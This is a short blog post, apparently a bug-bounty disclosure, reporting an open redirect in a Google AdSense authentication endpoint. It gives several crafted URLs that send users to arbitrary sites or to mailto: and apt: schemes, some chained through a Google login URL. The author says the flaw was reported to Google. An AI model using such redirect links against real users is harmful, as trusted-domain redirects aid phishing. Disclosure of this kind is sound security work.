Open Redirector Vulnerability – Google Adsense

google-adsense
This is a open URL Redirector Vulnerabilities that exist in the Google Adsense. For the impact, a user should have a google adsense account.

 

https://www.google.com/adsense/gaiaauth2?destination= [ ANY URL ]
https://www.google.com/adsense/gaiaauth2?destination=http://facebook.com
https://www.google.com/adsense/gaiaauth2?destination=http://nareshlamgade.com.np

 

More redirection :

https://www.google.com/adsense/gaiaauth2?destination=mailto:obama@whitehouse.gov

https://www.google.com/adsense/gaiaauth2?destination=apt:google

https://accounts.google.com/AddSession?service=adsense&continue=https://www.google.com/adsense/gaiaauth2?destination=mailto:nareshlamgade@gmail.com

https://www.google.com/adsense/gaiaauth2?destination=help:google.com

I reported the vulnerabilities and two of them replied :

google-adse

 

Another reply :

ad-2

 

open-redirect-vulnerability

Here is the video which I made for submitting.

Comments

There are no comments.

Leave a Reply

You may use these HTML tags and attributes: <a href="" title=""> <abbr title=""> <acronym title=""> <b> <blockquote cite=""> <cite> <code> <del datetime=""> <em> <i> <q cite=""> <s> <strike> <strong>